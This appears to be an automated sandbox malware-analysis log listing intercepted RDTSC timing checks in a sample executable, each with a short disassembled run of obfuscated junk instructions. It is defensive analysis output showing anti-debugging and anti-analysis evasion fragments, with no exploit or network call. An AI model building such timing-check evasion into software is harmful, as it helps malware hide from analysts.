Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022C7E second address: 1022CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62027h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F0D84D6201Eh 0x0000000f jmp 00007F0D84D6201Dh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022E1C second address: 1022E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0D8517B906h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022E2F second address: 1022E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022E33 second address: 1022E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0D8517B90Eh 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022E47 second address: 1022E5F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0D84D6201Fh 0x00000008 pop esi 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10235AB second address: 10235B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10235B3 second address: 10235D3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D84D62028h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027C26 second address: 1027C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0D8517B908h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027C36 second address: 1027C3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027EE0 second address: 1027EE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027EE8 second address: 1027EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D84D6201Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027EF9 second address: 1027F21 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D8517B906h 0x00000008 jmp 00007F0D8517B919h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 102832C second address: 1028332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027947 second address: 102795D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D8517B90Ch 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 102795D second address: 1027963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027963 second address: 1027967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 100977A second address: 100977E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 100BE17 second address: 100BE26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F0D8517B906h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1028602 second address: 102862B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D6201Dh 0x00000007 jmp 00007F0D84D62021h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10288B0 second address: 10288B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 102B425 second address: 102B42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 102CA4A second address: 102CA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10312C4 second address: 10312D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d js 00007F0D84D62016h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10312D8 second address: 10312E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0D8517B906h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10312E4 second address: 10312E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FB15C2 second address: FB15D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D8517B912h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7830 second address: FF7855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F0D84D62016h 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7855 second address: FF7859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7859 second address: FF7879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D84D62026h 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7879 second address: FD73A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B917h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0D8517B908h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 add dword ptr [ebp+122D2157h], ebx 0x0000002a mov dword ptr [ebp+122D334Ah], esi 0x00000030 call dword ptr [ebp+122D2629h] 0x00000036 jbe 00007F0D8517B90Ah 0x0000003c push edi 0x0000003d pushad 0x0000003e popad 0x0000003f pop edi 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 jnl 00007F0D8517B906h 0x0000004b jmp 00007F0D8517B914h 0x00000050 popad 0x00000051 jmp 00007F0D8517B90Fh 0x00000056 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7A77 second address: FF7A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7A83 second address: FF7A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7E4D second address: FF7E53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7E53 second address: FF7EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0D8517B906h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 39F6BAA1h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F0D8517B908h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jmp 00007F0D8517B911h 0x00000034 mov dword ptr [ebp+12458DB4h], esi 0x0000003a push C1549D7Dh 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7F2F second address: FF7F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D84D62020h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F0D84D62018h 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF8017 second address: FF801B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF8237 second address: FF8241 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF8241 second address: FF8248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF837A second address: FF83BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F0D84D6201Dh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0D84D62018h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000004h 0x00000029 mov dword ptr [ebp+122D2157h], ebx 0x0000002f nop 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF8895 second address: FF889A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF89DD second address: FF89E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0D84D62016h 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF89E7 second address: FF8A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 jmp 00007F0D8517B913h 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0D8517B90Fh 0x00000025 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF8AC7 second address: FF8B11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 nop 0x00000011 xor edi, 5741E799h 0x00000017 lea eax, dword ptr [ebp+12489605h] 0x0000001d pushad 0x0000001e mov ecx, dword ptr [ebp+122D3A9Bh] 0x00000024 mov ebx, eax 0x00000026 popad 0x00000027 mov edi, dword ptr [ebp+122D1C27h] 0x0000002d nop 0x0000002e push ecx 0x0000002f js 00007F0D84D6201Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FD7E22 second address: FD7E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FD7E2A second address: FD7E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10304DE second address: 10304E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10304E3 second address: 103050A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0D84D62016h 0x00000009 ja 00007F0D84D62016h 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007F0D84D62016h 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F0D84D6201Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1030CD4 second address: 1030CD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1030CD9 second address: 1030CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0D84D6201Dh 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1030CED second address: 1030CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1030CFC second address: 1030D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1039958 second address: 103995E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 103995E second address: 1039964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1039964 second address: 1039980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B90Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a ja 00007F0D8517B906h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038328 second address: 103832E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 103832E second address: 1038350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jbe 00007F0D8517B906h 0x00000010 pop esi 0x00000011 jnc 00007F0D8517B911h 0x00000017 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038665 second address: 103866B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 103866B second address: 1038674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10387B7 second address: 10387C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0D84D62016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10387C2 second address: 10387C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10387C8 second address: 10387DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D6201Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038B00 second address: 1038B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038C75 second address: 1038C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038C79 second address: 1038C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038C81 second address: 1038C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 je 00007F0D84D62016h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038C90 second address: 1038C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F0D8517B906h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038C9F second address: 1038CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038CA3 second address: 1038CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038DE4 second address: 1038DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038DEA second address: 1038DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038F68 second address: 1038F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62026h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038F82 second address: 1038F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038F8C second address: 1038F92 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038F92 second address: 1038FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0D8517B90Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038FA3 second address: 1038FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10397D9 second address: 10397EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D8517B906h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F0D8517B906h 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10397EE second address: 10397F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 103FF9A second address: 103FFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F0D8517B91Ah 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1042FA2 second address: 1042FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1042B99 second address: 1042BC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B918h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0D8517B91Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1048208 second address: 104820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 104CA6A second address: 104CACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007F0D8517B911h 0x0000000b jng 00007F0D8517B906h 0x00000011 pop eax 0x00000012 je 00007F0D8517B912h 0x00000018 popad 0x00000019 pushad 0x0000001a jno 00007F0D8517B908h 0x00000020 pushad 0x00000021 jmp 00007F0D8517B912h 0x00000026 jmp 00007F0D8517B90Ch 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F0D8517B906h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 104CACE second address: 104CAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 104CAD2 second address: 104CAD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 104D2DF second address: 104D30C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D84D62026h 0x0000000d jmp 00007F0D84D6201Fh 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 104D30C second address: 104D310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10506DE second address: 1050714 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D84D62018h 0x00000008 jmp 00007F0D84D6201Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0D84D62026h 0x00000019 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1050131 second address: 105014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D8517B906h 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F0D8517B906h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F0D8517B906h 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105014C second address: 1050150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1050150 second address: 1050156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
